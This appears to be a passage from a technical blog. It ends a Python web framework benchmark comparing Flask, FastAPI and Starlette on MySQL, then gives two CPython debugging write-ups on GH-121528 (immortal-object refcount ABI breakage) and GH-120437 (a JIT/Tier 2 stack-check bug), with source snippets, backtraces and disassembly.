DATABASE_URL = f"mysql://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"
db = dataset.connect(DATABASE_URL, engine_kwargs={"pool_size": 10000})

TEMP = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+=-"


@app.route("/demo", methods=["GET"])
def demo_code():
    return Response(
        response=json.dumps(
            list(
                db.query(
                    f"select * from demo_data where name='{''.join(random.choices(TEMP, k=random.randrange(1, 254)))}'"
                )
            ),
            default=str
        ),
        status=200,
        content_type="application/json",
    )


if __name__ == "__main__":
    app.run(debug=True)

FastAPI code is as follows:

import random
import os
from typing import List

import databases
import pymysql
import sqlalchemy
import json
from fastapi import FastAPI
from fastapi.responses import Response
from pydantic import BaseModel

pymysql.install_as_MySQLdb()

AYSNC_DATABASE_URL = f"mysql+aiomysql://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"
SYNC_DATABASE_URL = f"mysql+mysqldb://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"

database = databases.Database(AYSNC_DATABASE_URL, max_size=10000)

metadata = sqlalchemy.MetaData()

demo_data = sqlalchemy.Table(
    "demo_data",
    metadata,
    sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
    sqlalchemy.Column("name", sqlalchemy.String),
    sqlalchemy.Column("create_time", sqlalchemy.DATETIME),
    sqlalchemy.Column("update_time", sqlalchemy.DATETIME),
)
engine = sqlalchemy.create_engine(SYNC_DATABASE_URL)
metadata.create_all(engine)
TEMP = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+=-"


class DemoData(BaseModel):
    id: int
    name: str


app = FastAPI()

init = False


@app.get("/demo", response_model=List[DemoData])
async def demo_code():
    global init
    if not init:
        await database.connect()
        init = True

    query = demo_data.select().where(
        demo_data.c.name == "".join(random.choices(TEMP, k=random.randrange(1, 254)))
    )
    data = await database.fetch_all(query)
    response = json.dumps(data, default=str)
    return Response(content=response, status_code=200, media_type="application/json")

Starlette code is as follows:

import random
import os
from typing import List

import databases
import pymysql
import json
import sqlalchemy
from starlette.applications import Starlette
from starlette.responses import Response
from starlette.routing import Route
from pydantic import BaseModel

pymysql.install_as_MySQLdb()

AYSNC_DATABASE_URL = f"mysql+aiomysql://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"
SYNC_DATABASE_URL = f"mysql+mysqldb://{os.getenv('DATABASE_USER')}:{os.getenv('DATABASE_PASSWORD')}@{os.getenv('DATABASE_HOST')}:3306/demo"

database = databases.Database(AYSNC_DATABASE_URL, max_size=10000)

metadata = sqlalchemy.MetaData()

demo_data = sqlalchemy.Table(
    "demo_data",
    metadata,
    sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
    sqlalchemy.Column("name", sqlalchemy.String),
    sqlalchemy.Column("create_time", sqlalchemy.DATETIME),
    sqlalchemy.Column("update_time", sqlalchemy.DATETIME),
)
engine = sqlalchemy.create_engine(SYNC_DATABASE_URL)
metadata.create_all(engine)
TEMP = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+=-"


class DemoData(BaseModel):
    id: int
    name: str


init = False


async def demo_code(request):
    global init
    if not init:
        await database.connect()
        init = True

    query = demo_data.select().where(
        demo_data.c.name == "".join(random.choices(TEMP, k=random.randrange(1, 254)))
    )
    data = await database.fetch_all(query)
    return Response(content=json.dumps(data, default=str), status_code=200, media_type="application/json")

routes = [
    Route("/demo", demo_code, methods=["GET"]),
]

app = Starlette(debug=False, routes=routes)

The deployment method is as follows:

All services are deployed on K8S, with POD type as Guaranteed
All image is built base on the Python 3.12
Services are limited to 6 Core CPU
Django and Flask are deployed based on Gevent + Gunicorn, using Greenify to patch the binary
FastAPI and Starlette are deployed based on uvicorn, using uvloop as the event loop

OK, now let’s reveal the test results.

Test Results Under Standard Operations

Django:

FastAPI:

Flask:

Starlette:

Django is undoubtedly the last, while the performance of the other three is Flask + Gevent > Starlette > FastAPI. The CPU usage of the latter three frameworks is all > 90%.

Idle Test

To be on the safe side, we conducted an idle test on the latter three frameworks.

Flask:

FastAPI:

Starlette:

Starlette > FastAPI > Flask + Gevent

Conclusion

Currently, the overall conclusions are as follows:

In idle situations, the performance of asyncio is significantly better than Gevent. Even with the framework factor, there is still a 10-20% improvement.
In the case of ORM + MySQL Driver, Gevent’s ecosystem is better than asyncio’s ecosystem.

If we switch to ORM + PGSQL ecosystem, will the conclusion be even better? Looking forward to the results of the next round of tests.

Debug 日志：CPython GH-121528

2024-07-16T18:20:00.000Z

Debug 日志系列第二篇，CPython 的 GH-121528，也是很有趣的调试和讨论过程，写出来希望帮助大家

太长不看的版：Python 3.13 Beta 版本中，因为 PEP 683 的实现+周边的改动，导致低版本下编译的一些扩展无法在 Python 3.13 中运行

开篇

7月9日的时候，PyO3 社区提出了一个 Bug , 编号为 GH-121528¹。这个 Bug 可以做这样的表示

假设我们有一个 C 扩展文件

#include 

static PyObject *
foo_bar(PyObject *self, PyObject *args)
{
Py_INCREF(PyExc_TypeError);
PyErr_SetString(PyExc_TypeError, "foo");
return NULL;
}

static PyMethodDef foomethods[] = {
{"bar", foo_bar, METH_VARARGS, ""},
{NULL, NULL, 0, NULL},
};

static PyModuleDef foomodule = {
PyModuleDef_HEAD_INIT,
.m_name = "foo",
.m_doc = "foo test module",
.m_size = -1,
.m_methods = foomethods,
};

PyMODINIT_FUNC
PyInit_foo(void)
{
return PyModule_Create(&foomodule);
}

然后假设我们有这样的 setup.py 文件

from setuptools import setup, Extension

setup(name='foo',
      version='0',
      ext_modules=[
          Extension('foo', ['foo.c'], py_limited_api='cp38'),
      ])

OK，基于 Limited API (aka Stable ABI) 编译，社区发现，如果在 <= 3.11 的版本中编译的扩展，在 Python 3.13 以及最新主分支中加载扩展，那么会出现问题

我们来看下堆栈

Process 10157 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = hit program assert
    frame #4: 0x000000010034043c python.exe`_PyType_AllocNoTrack.cold.2 [inlined] _PyObject_Init(op=, typeobj=) at pycore_object.h:269:5 [opt]
   266  {
   267      assert(op != NULL);
   268      Py_SET_TYPE(op, typeobj);
-> 269      assert(_PyType_HasFeature(typeobj, Py_TPFLAGS_HEAPTYPE) || _Py_IsImmortal(typeobj));
   270      Py_INCREF(typeobj);
   271      _Py_NewReference(op);
   272  }
Target 0: (python.exe) stopped.
warning: python.exe was compiled with optimization - stepping may behave oddly; variables may not be available.
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = hit program assert
    frame #0: 0x0000000190ec75e0 libsystem_kernel.dylib`__pthread_kill + 8
    frame #1: 0x0000000190efff70 libsystem_pthread.dylib`pthread_kill + 288
    frame #2: 0x0000000190e0c908 libsystem_c.dylib`abort + 128
    frame #3: 0x0000000190e0bc1c libsystem_c.dylib`__assert_rtn + 284
  * frame #4: 0x000000010034043c python.exe`_PyType_AllocNoTrack.cold.2 [inlined] _PyObject_Init(op=, typeobj=) at pycore_object.h:269:5 [opt]
    frame #5: 0x000000010034041c python.exe`_PyType_AllocNoTrack.cold.2 at typeobject.c:2224:9 [opt]
    frame #6: 0x00000001001299a8 python.exe`_PyType_AllocNoTrack [inlined] _PyObject_Init(op=0x0000000100b0eba0, typeobj=0x000000010054db80) at pycore_object.h:269:5 [opt]
    frame #7: 0x00000001001299a4 python.exe`_PyType_AllocNoTrack(type=0x000000010054db80, nitems=0) at typeobject.c:2224:9 [opt]
    frame #8: 0x00000001001297bc python.exe`PyType_GenericAlloc(type=0x000000010054db80, nitems=) at typeobject.c:2238:21 [opt]
    frame #9: 0x00000001000a7638 python.exe`BaseException_vectorcall(type_obj=0x000000010054db80, args=0x000000016fdfd500, nargsf=9223372036854775809, kwnames=) at exceptions.c:92:37 [opt]
    frame #10: 0x0000000100093220 python.exe`_PyObject_VectorcallTstate(tstate=0x00000001005e6370, callable=0x000000010054db80, args=0x000000016fdfd500, nargsf=9223372036854775809, kwnames=0x0000000000000000) at pycore_call.h:167:11 [opt]
    frame #11: 0x00000001000942bc python.exe`PyObject_CallOneArg(func=, arg=) at call.c:395:12 [opt]
    frame #12: 0x0000000100214d2c python.exe`_PyErr_CreateException(exception_type=0x000000010054db80, value=) at errors.c:44:15 [opt]
    frame #13: 0x0000000100215160 python.exe`_PyErr_SetObject(tstate=0x00000001005e6370, exception=0x000000010054db80, value=0x0000000100c41530) at errors.c:184:33 [opt]
    frame #14: 0x0000000100214ed0 python.exe`PyErr_SetString [inlined] _PyErr_SetString(tstate=0x00000001005e6370, exception=, string=) at errors.c:291:9 [opt]
    frame #15: 0x0000000100214eb0 python.exe`PyErr_SetString(exception=0x000000010054db80, string=) at errors.c:300:5 [opt]
    frame #16: 0x000000010099bf30 foo.abi3.so`foo_bar(self=, args=) at foo.c:7:2 [opt]

OK ，看到问题的部分的代码是这样

static inline void
_PyObject_Init(PyObject *op, PyTypeObject *typeobj)
{
    assert(op != NULL);
    Py_SET_TYPE(op, typeobj);
    assert(_PyType_HasFeature(typeobj, Py_TPFLAGS_HEAPTYPE) || _Py_IsImmortal(typeobj));
    Py_INCREF(typeobj);
    _Py_NewReference(op);
}

我们能看到是在处理 PyExc_TypeError 对象的时候，进入到了 _PyObject_Init 函数，这里有一个逻辑是判定对象是否是在堆上或者是 Immortal 对象

我们 Bisect 确认了下，这个变更是在 GH-116115² 中引入的，原本的逻辑是这样的

static inline void
_PyObject_Init(PyObject *op, PyTypeObject *typeobj)
{
    assert(op != NULL);
    Py_SET_TYPE(op, typeobj);
    if (_PyType_HasFeature(typeobj, Py_TPFLAGS_HEAPTYPE)) {
        Py_INCREF(typeobj);
    }
    Py_INCREF(typeobj);
    _Py_NewReference(op);
}

这里我们需要先去看下 PyExc_TypeError 的定义

#define PyObject_HEAD_INIT(type)    \
    {                               \
        { _Py_IMMORTAL_REFCNT },    \
        (type)                      \
    },

#define PyVarObject_HEAD_INIT(type, size) \
    {                                     \
        PyObject_HEAD_INIT(type)          \
        (size)                            \
    },


static PyTypeObject _PyExc_ ## EXCNAME = { \
    PyVarObject_HEAD_INIT(NULL, 0) \
    # EXCNAME, \
    sizeof(Py ## EXCSTORE ## Object), 0, \
    (destructor)EXCSTORE ## _dealloc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \
    (reprfunc)EXCSTR, 0, 0, 0, \
    Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC, \
    PyDoc_STR(EXCDOC), (traverseproc)EXCSTORE ## _traverse, \
    (inquiry)EXCSTORE ## _clear, 0, 0, 0, 0, EXCMETHODS, \
    EXCMEMBERS, EXCGETSET, &_ ## EXCBASE, \
    0, 0, 0, offsetof(Py ## EXCSTORE ## Object, dict), \
    (initproc)EXCSTORE ## _init, 0, EXCNEW,\
}; \
PyObject *PyExc_ ## EXCNAME = (PyObject *)&_PyExc_ ## EXCNAME

SimpleExtendsException(PyExc_Exception, TypeError,
                       "Inappropriate argument type.");

这里我们能看到（注意 _Py_IMMORTAL_REFCNT 和 Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC），PyExc_TypeError 是一个非堆上 Immortal 对象，在 GH-116115² 之前，我们走到 false 的分支，而在之后，理论上讲 _PyType_HasFeature(typeobj, Py_TPFLAGS_HEAPTYPE) || _Py_IsImmortal(typeobj) 应该是一个为 true 的表达式，不应该会 assert failed 才对。那么为什么呢

我们在这里断点一下看一下表达式的值，结果我们惊讶的发现，_Py_IsImmortal(typeobj) 也为 false ，为啥捏？

我们先来看一下 _Py_IsImmortal(typeobj) 的实现

static inline Py_ALWAYS_INLINE int _Py_IsImmortal(PyObject *op)
{

    return (op->ob_refcnt == _Py_IMMORTAL_REFCNT);
}

这里我们能看到，_Py_IsImmortal 的实现是判断对象的引用计数是否等于 _Py_IMMORTAL_REFCNT ，奇怪，我们之前看到的 PyExc_TypeError 的定义里其 Reference Count 是 _Py_IMMORTAL_REFCNT，难道 reference count 发生了什么变化？这个时候我们需要注意到，在 PyErr_SetString 之前我们调用了 Py_INCREF，我们来验证下

我们在 foo_bar 函数中加入断点，我们发现，在执行 Py_INCREF 后，我们我们的引用技术 +1 ，从而导致了 _Py_IsImmortal 的判断为 false

那么这里新的问题又来了，为什么我们在 >= 3.12 的版本上编译的插件，在后续执行正常呢？这种奇怪的问题我们就先来看下汇编

在 3.11 下编译的产物

0000000000001120 :
    1120:48 83 ec 08          sub    $0x8,%rsp
    1124:48 8b 05 9d 2e 00 00 mov    0x2e9d(%rip),%rax        # 3fc8 
    112b:48 8d 35 ce 0e 00 00 lea    0xece(%rip),%rsi        # 2000 <_fini+0xe9c>
    1132:48 8b 38             mov    (%rax),%rdi
    1135:48 83 07 01          addq   $0x1,(%rdi)
    1139:e8 f2 fe ff ff       call   1030 
    113e:31 c0                xor    %eax,%eax
    1140:48 83 c4 08          add    $0x8,%rsp
    1144:c3                   ret
    1145:66 66 2e 0f 1f 84 00 data16 cs nopw 0x0(%rax,%rax,1)
    114c:00 00 00 00

在 3.13 下编译的产物

0000000000001120 :
    1120:48 83 ec 08          sub    $0x8,%rsp
    1124:48 8b 05 9d 2e 00 00 mov    0x2e9d(%rip),%rax        # 3fc8 
    112b:48 8b 38             mov    (%rax),%rdi
    112e:8b 07                mov    (%rdi),%eax
    1130:83 c0 01             add    $0x1,%eax
    1133:74 02                je     1137 
    1135:89 07                mov    %eax,(%rdi)
    1137:48 8d 35 c2 0e 00 00 lea    0xec2(%rip),%rsi        # 2000 <_fini+0xe9c>
    113e:e8 ed fe ff ff       call   1030 
    1143:31 c0                xor    %eax,%eax
    1145:48 83 c4 08          add    $0x8,%rsp
    1149:c3                   ret
    114a:66 0f 1f 44 00 00    nopw   0x0(%rax,%rax,1)

我们能发现我们在 call 1030 这条指令前的汇编完全不一样，我们这里能归纳出两点

PyErr_SetString 调用的地址是在运行时动态解析的
而 Py_INCREF 则处理成不同逻辑的汇编了

这种情况只有两种可能

Py_INCREF 是一组宏定义
Py_INCREF 是被 inline 处理了

我们来看下 Py_INCREF 的定义

1	static inline Py_ALWAYS_INLINE void Py_INCREF(PyObject *op);

果然是第二种情况，那么这种情况就意味着 Py_INCREF 的实现在 3.13 和 3.11 中是不一样的，我们来看下代码

3.13

static inline Py_ALWAYS_INLINE void Py_INCREF(PyObject *op)
{
    if (_Py_IsImmortal(op)) {
        return;
    }
    op->ob_refcnt++;
}

3.11

static inline void Py_INCREF(PyObject *op)
{

    op->ob_refcnt++;
}

果然，在 3.13 中我们对于 immortal 对象的引用计数不再增加，而 3.11 不会做检查直接增加，这会使 immortal 对象的引用计数不再是 _Py_IMMORTAL_REFCNT，从而导致了我们的问题

这个问题那么其实说白了可以这样总结，在 PEP 683 Immortal 对象的实现中，我们将 immortal 的状态和引用技术 mix up 了，导致我们部分 ABI 在低版本 inline 后在高版本中有错误的逻辑。同时我们在 GH-116115² 中收窄了对于对象检测的严谨性，从而导致出现了兼容的问题

这个问题其实修复起来也很容易，目前我和另外一个 Python 核心开发者各自采用了一种处理方式

我是选择将 assert 的部分 revert 到之前的 if condition 检查，这样可以保证对象的兼容性，改动也比较小。缺陷就是算是 case by case 的解决
另外一位核心开发者解决的方式是将 immortal 的检查范围放大（大小于某个区间即可认为是 immortal 对象），这样的好处是可以扩展，而缺陷就是可能让 immortal 对象的实现复杂度进一步提升

不过说白了归根到底还是 PEP 683 实现的时候状态混合了，估计后续还有不少问题

总结

这个 case 其实也是个查起来不难，修复不难的问题。但是后面牵扯的东西太多了，很多有趣的讨论可以点进 issue 去看看

Reference

https://github.com/python/cpython/issues/121528

https://github.com/python/cpython/pull/116115

Debug 日志：CPython GH-120437

2024-06-19T19:40:00.000Z

和 SRE 日志系列一样，Debug 日志用来复盘我一些可以公开的调试经历，希望能帮助到大家。

这篇是 Python 3.13 Beta 下 JIT/Tier 2 优化器的一个 Bug ，前后历时五天，最终修改点很小，非常有趣

开篇

13号的时候，用户反馈了一个 Bug，编号 GH120437¹ ，具体的行为是这样

Python 3.13 引入了实验性的 JIT 优化器，具体的细节可以参考我之前的文章简单聊聊 Python 3.13 的 JIT 方案²，用户可以在构建的时候选择性的开启

./configure —enable-experimental-jit —with-pydebug && make -j

用户在开启 JIT 的情况下，发现了一个非常奇怪的问题，执行

./python -m ensurepip

会抛出异常

subprocess.CalledProcessError: Command '['/home/jglass/Documents/cpython/python', '-W', 'ignore::DeprecationWarning', '-c', '\nimport runpy\nimport sys\nsys.path = [\'/tmp/tmpsu81mj6o/pip-24.0-py3-none-any.whl\'] + sys.path\nsys.argv[1:] = [\'install\', \'--no-cache-dir\', \'--no-index\', \'--find-links\', \'/tmp/tmpsu81mj6o\', \'pip\']\nrunpy.run_module("pip", run_name="__main__", alter_sys=True)\n']' died with .

我在最新分支上无法复现这个问题，在3.13分支上能够稳定复现。

能够稳定复现就好办了。首先为了调试下去，我们需要在一个更小范围的能够复现的测试用例，我去阅读了一下 ensurepip 部分的代码，有关的部分大概长这样

def _run_pip(args, additional_paths=None):
    # Run the bootstrapping in a subprocess to avoid leaking any state that happens
    # after pip has executed. Particularly, this avoids the case when pip holds onto
    # the files in *additional_paths*, preventing us to remove them at the end of the
    # invocation.
    code = f"""
import runpy
import sys
sys.path = {additional_paths or []} + sys.path
sys.argv[1:] = {args}
runpy.run_module("pip", run_name="__main__", alter_sys=True)
"""

    cmd = [
        sys.executable,
        '-W',
        'ignore::DeprecationWarning',
        '-c',
        code,
    ]
    if sys.flags.isolated:
        # run code in isolated mode if currently running isolated
        cmd.insert(1, '-I')
    return subprocess.run(cmd, check=True).returncode

那么这里我直接构造一个 Python 脚本，直接用 Python 来执行，理论上讲是没有问题的

import runpy
import sys
sys.path = ['/tmp/tmp04bw2hi9/pip-23.3.2-py3-none-any.whl'] + sys.path
sys.argv[1:] = ['install', '--no-cache-dir', '--no-index', '--find-links', '/tmp/tmp04bw2hi9', 'pip']
runpy.run_module("pip", run_name="__main__", alter_sys=True)

bingo，这个脚本能够稳定复现问题，那么我们就可以开始进一步的分析问题了

我们现在要做的一个很关键的事是确认 Bug 引入的时间点和范围。那么这个问题理论上讲是 JIT 优化器引入的，JIT 第一个引入的 commit 是 f6d9e5926b6138994eaa60d1c36462e36105733d³，那么我们可以通过 git bisect 来确认问题的引入时间点（这里额外的确认是该 commit 前一个 commit 是没有问题的）

经过确认后，我们发现问题的引入时间点是 1ab6356ebec25f216a0eddbd81225abcb93f2d55⁴，那么我们就可以开始进一步的分析了

先上 gdb ，看一下栈的情况

__pthread_kill_implementation (threadid=, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
44            return INTERNAL_SYSCALL_ERROR_P (ret) ? INTERNAL_SYSCALL_ERRNO (ret) : 0;                                                                                                                          
(gdb) bt
#0  __pthread_kill_implementation (threadid=, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
#1  0x00007ffff7d3eeb3 in __pthread_kill_internal (threadid=, signo=6) at pthread_kill.c:78
#2  0x00007ffff7ce6a30 in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
#3  0x00007ffff7cce4c3 in __GI_abort () at abort.c:79
#4  0x00007ffff7cce3df in __assert_fail_base (fmt=0x7ffff7e59b68 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x7ffff69bb47c "tstate->datastack_top < tstate->datastack_limit", 
    file=file@entry=0x7ffff69bb431 "/home/manjusaka/Documents/projects/cpython/Include/internal/pycore_frame.h", line=line@entry=284, 
    function=function@entry=0x7ffff69bb4ac "_PyInterpreterFrame *_PyFrame_PushUnchecked(PyThreadState *, PyFunctionObject *, int)") at assert.c:94
#5  0x00007ffff7cdec67 in __assert_fail (assertion=0x7ffff69bb47c "tstate->datastack_top < tstate->datastack_limit", 
    file=0x7ffff69bb431 "/home/manjusaka/Documents/projects/cpython/Include/internal/pycore_frame.h", line=284, 
    function=0x7ffff69bb4ac "_PyInterpreterFrame *_PyFrame_PushUnchecked(PyThreadState *, PyFunctionObject *, int)") at assert.c:103
#6  0x00007ffff69b07e8 in ?? ()
#7  0x416b4a710a2907e9 in ?? ()
#8  0x00005555556c9023 in _Py_INCREF_IncRefTotal () at Objects/object.c:230
Backtrace stopped: previous frame inner to this frame (corrupt stack?)

What the fuck，这什么栈？我们能拿到的唯一的有效信息是崩溃在这里

static inline _PyInterpreterFrame *
_PyFrame_PushUnchecked(PyThreadState *tstate, PyFunctionObject *func, int null_locals_from)
{
    CALL_STAT_INC(frames_pushed);
    PyCodeObject *code = (PyCodeObject *)func->func_code;
    _PyInterpreterFrame *new_frame = (_PyInterpreterFrame *)tstate->datastack_top;
    tstate->datastack_top += code->co_framesize;
    assert(tstate->datastack_top < tstate->datastack_limit);
    _PyFrame_Initialize(new_frame, func, NULL, code, null_locals_from);
    return new_frame;
}

其余的信息，没有。。。这也算 JIT 的坑了，由于是动态加载的二进制，会导致调试进程的时候会有很多额外的工作量。理论上我可以挂一下 frame 拿到 executor 的信息然后再调 JIT 的汇编的，但是我不想这么搞啊？

这里陷入了僵局，我在实在没想到很好的办法准备硬调的时候，遛狗时突然想起 Python 的 JIT 是基于 Copy and Patch 做的，是基于已有的 executor case 来生成 JIT 二进制的（具体细节还是参考我之前那篇文章）。那么我应该可以直接将 JIT 的部分关掉，只用 Tier2 优化器的 OPCODE 来测试，应该行为是一致的

重新基于 ./configure --with-pydebug --enable-pystats --enable-profiling --with-dtrace --enable-experimental-jit=interpreter 来编译代码，用gdb 测试，果然，这次的栈美好了很多

#1  0x00007ffff7d3eeb3 in __pthread_kill_internal (threadid=, signo=6) at pthread_kill.c:78
#2  0x00007ffff7ce6a30 in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
#3  0x00007ffff7cce4c3 in __GI_abort () at abort.c:79
#4  0x00007ffff7cce3df in __assert_fail_base (fmt=0x7ffff7e59b68 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55555591a150 "tstate->datastack_top < tstate->datastack_limit", 
    file=file@entry=0x555555901138 "./Include/internal/pycore_frame.h", line=line@entry=284, function=function@entry=0x555555977030 <__PRETTY_FUNCTION__.30> "_PyFrame_PushUnchecked") at assert.c:94
#5  0x00007ffff7cdec67 in __assert_fail (assertion=assertion@entry=0x55555591a150 "tstate->datastack_top < tstate->datastack_limit", file=file@entry=0x555555901138 "./Include/internal/pycore_frame.h", 
    line=line@entry=284, function=function@entry=0x555555977030 <__PRETTY_FUNCTION__.30> "_PyFrame_PushUnchecked") at assert.c:103
#6  0x000055555578ec88 in _PyFrame_PushUnchecked (tstate=tstate@entry=0x555555d9e0c0 <_PyRuntime+293952>, func=, null_locals_from=null_locals_from@entry=3)
    at ./Include/internal/pycore_frame.h:284
#7  0x00005555557b8c51 in _PyEval_EvalFrameDefault (tstate=0x555555d9e0c0 <_PyRuntime+293952>, frame=0x7ffff7f98e58, throwflag=0) at Python/executor_cases.c.h:3326
#8  0x00005555557bc37e in _PyEval_EvalFrame (tstate=tstate@entry=0x555555d9e0c0 <_PyRuntime+293952>, frame=, throwflag=throwflag@entry=0) at ./Include/internal/pycore_ceval.h:118
#9  0x00005555557bc4a4 in _PyEval_Vector (tstate=0x555555d9e0c0 <_PyRuntime+293952>, func=0x7ffff6fe10d0, locals=locals@entry=0x0, args=0x7fffffff15e0, argcount=2, kwnames=0x0) at Python/ceval.c:1818
#10 0x00005555556728e4 in _PyFunction_Vectorcall (func=, stack=, nargsf=, kwnames=) at Objects/call.c:413
#11 0x0000555555672c54 in _PyObject_VectorcallTstate (tstate=tstate@entry=0x555555d9e0c0 <_PyRuntime+293952>, callable=callable@entry=, args=args@entry=0x7fffffff15e0, 
    nargsf=nargsf@entry=2, kwnames=kwnames@entry=0x0) at ./Include/internal/pycore_call.h:168
#12 0x0000555555673b8c in object_vacall (tstate=tstate@entry=0x555555d9e0c0 <_PyRuntime+293952>, base=base@entry=0x0, callable=, vargs=vargs@entry=0x7fffffff1660)
    at Objects/call.c:819
#13 0x0000555555673cea in PyObject_CallMethodObjArgs (obj=0x0, name=) at Objects/call.c:880
#14 0x00005555557fb230 in import_find_and_load (tstate=tstate@entry=0x555555d9e0c0 <_PyRuntime+293952>, abs_name=abs_name@entry='_winapi') at Python/import.c:3080
#15 0x00005555557feb3a in PyImport_ImportModuleLevelObject (name=name@entry='_winapi', globals=, 
    locals=locals@entry={'__name__': 'mimetypes', '__doc__': 'Guess the MIME type of a file.\n\nThis module defines two useful functions:\n\nguess_type(url, strict=True) -- guess the MIME type and encoding of a URL.\n\nguess_extension(type, strict=True) -- guess the extension for a given MIME type.\n\nIt also contains the following, for tuning the behavior:\n\nData:\n\nknownfiles -- list of files to parse\ninited -- flag set when init() has been called\nsuffix_map -- dictionary mapping suffixes to suffixes\nencodings_map -- dictionary mapping suffixes to encodings\ntypes_map -- dictionary mapping suffixes to types\n\nFunctions:\n\ninit([files]) -- parse a list of files, default knownfiles (on Windows, the\n  default values are taken from the registry)\nread_mime_types(file) -- parse one file, return a dictionary or None\n', '__package__': '', '__loader__': , '__spec__': 
#16 0x000055555578f3fa in import_name (tstate=tstate@entry=0x555555d9e0c0 <_PyRuntime+293952>, frame=frame@entry=0x7ffff7f98b18, name='_winapi', fromlist=fromlist@entry=('_mimetypes_read_windows_registry',), 
    level=level@entry=0) at Python/ceval.c:2629
#17 0x00005555557a244b in _PyEval_EvalFrameDefault (tstate=0x555555d9e0c0 <_PyRuntime+293952>, frame=0x7ffff7f98b18, throwflag=0) at Python/generated_cases.c.h:3196
#18 0x00005555557bc37e in _PyEval_EvalFrame (tstate=tstate@entry=0x555555d9e0c0 <_PyRuntime+293952>, frame=, throwflag=throwflag@entry=0) at ./Include/internal/pycore_ceval.h:118

这个栈看着就轻松很多了，我们很轻松的来到 #7 ，判断出当前的 opcode _INIT_CALL_PY_EXACT_ARGS_x，这是一个 Tier2 的特化指令，这里可以近似的认为我们对于这个指令有足够的上下文，比如函数初始化的时候参数有两个（对应此处的 _INIT_CALL_PY_EXACT_ARGS_2),然后有一些 short pass，在这个 short pass 中，_PyFrame_PushUnchecked 会被快速调用（免去了额外的 frame 大小的校验）。那么我最开始的想法是这样，我可以在这个指令的特化逻辑加一个额外的 check，如果当前的线程状态中保存的栈大小小于我们需要的大小，那么则退出特化，走传统的调用方式，那么更改起来也相对简单，_INIT_CALL_PY_EXACT_ARGS_x 有一个前置指令是 _CHECK_FUNCTION_EXACT_ARGS

op(_CHECK_FUNCTION_EXACT_ARGS, (func_version/2, callable, self_or_null, unused[oparg] -- callable, self_or_null, unused[oparg])) {
    EXIT_IF(!PyFunction_Check(callable));
    PyFunctionObject *func = (PyFunctionObject *)callable;
    EXIT_IF(func->func_version != func_version);
    PyCodeObject *code = (PyCodeObject *)func->func_code;
    EXIT_IF(code->co_argcount != oparg + (self_or_null != NULL));
}

那么我们可以在这里添加一个额外的特化处理逻辑，如果当前的线程状态中保存的栈大小小于我们需要的大小，那么则退出特化，走传统的调用方式

op(_CHECK_FUNCTION_EXACT_ARGS, (func_version/2, callable, self_or_null, unused[oparg] -- callable, self_or_null, unused[oparg])) {
    EXIT_IF(!PyFunction_Check(callable));
    PyFunctionObject *func = (PyFunctionObject *)callable;
    EXIT_IF(func->func_version != func_version);
    PyCodeObject *code = (PyCodeObject *)func->func_code;
    EXIT_IF(code->co_argcount != oparg + (self_or_null != NULL));
    EXIT_IF(!_PyThreadState_HasStackSpace(tstate, code->co_framesize));
}

编译后通过测试，问题解决，我开始提交 PR。你是不是以为到这里就完事了？不，这里我犯了一个很典型的错误就是，逻辑没有闭环，我没有解释清楚，为什么在 1ab6356ebec25f216a0eddbd81225abcb93f2d55⁴ 引入了这个 Bug？查问题的时候逻辑闭环是个非常重要的事情

在提交 PR 后，核心开发者 Ken Jin（也是我现在的 Mentor）提醒我，这里的问题实际上可能和 _INIT_CALL_PY_EXACT_ARGS_x 毫无关联，而是 _CHECK_STACK_SPACE 特化的一个问题

他之所以能确定这一点，是因为他在看到这个问题的时候将 _CHECK_STACK_SPACE 的部分注释掉后，发现这个地方能够正常的运行。那么通常来说一个 Bug 只能有一个原因，那么我现在需要来查一查为什么 _CHECK_STACK_SPACE 会导致这个问题

这里要介绍下 _CHECK_STACK_SPACE 特化，是在 GH-116168⁵ 中引入的，这个特化的目的是为了在特定的情况下，我们可以合并一些栈的检查，这个特化的逻辑是这样

假设我们有这样的顺序调用，字节码如下

_CHECK_STACK_SPACE A
_PUSH_FRAME
_POP_FRAME
_CHECK_STACK_SPACE B
_PUSH_FRAME
_POP_FRAME

那么我们可以确定这个函数需要的大小是 max(A,B)，那我们特化的后的指令如下

_CHECK_STACK_SPACE max(A, B)
_PUSH_FRAME
_POP_FRAME
_PUSH_FRAME
_POP_FRAME

对于嵌套调用

_CHECK_STACK_SPACE A
_PUSH_FRAME
_CHECK_STACK_SPACE B
_PUSH_FRAME
_POP_FRAME
_POP_FRAME

那么我们可以确定这个函数需要的大小是 A + B，那我们特化的后的指令如下

_CHECK_STACK_SPACE A + B
_PUSH_FRAME
_PUSH_FRAME
_POP_FRAME
_POP_FRAME

实现上来说，在第一次调用 _CHECK_STACK_SPACE 的时候，会有这样的逻辑

case _CHECK_STACK_SPACE: {
    assert(corresponding_check_stack == NULL);
    corresponding_check_stack = &buffer[pc];
    break;
}

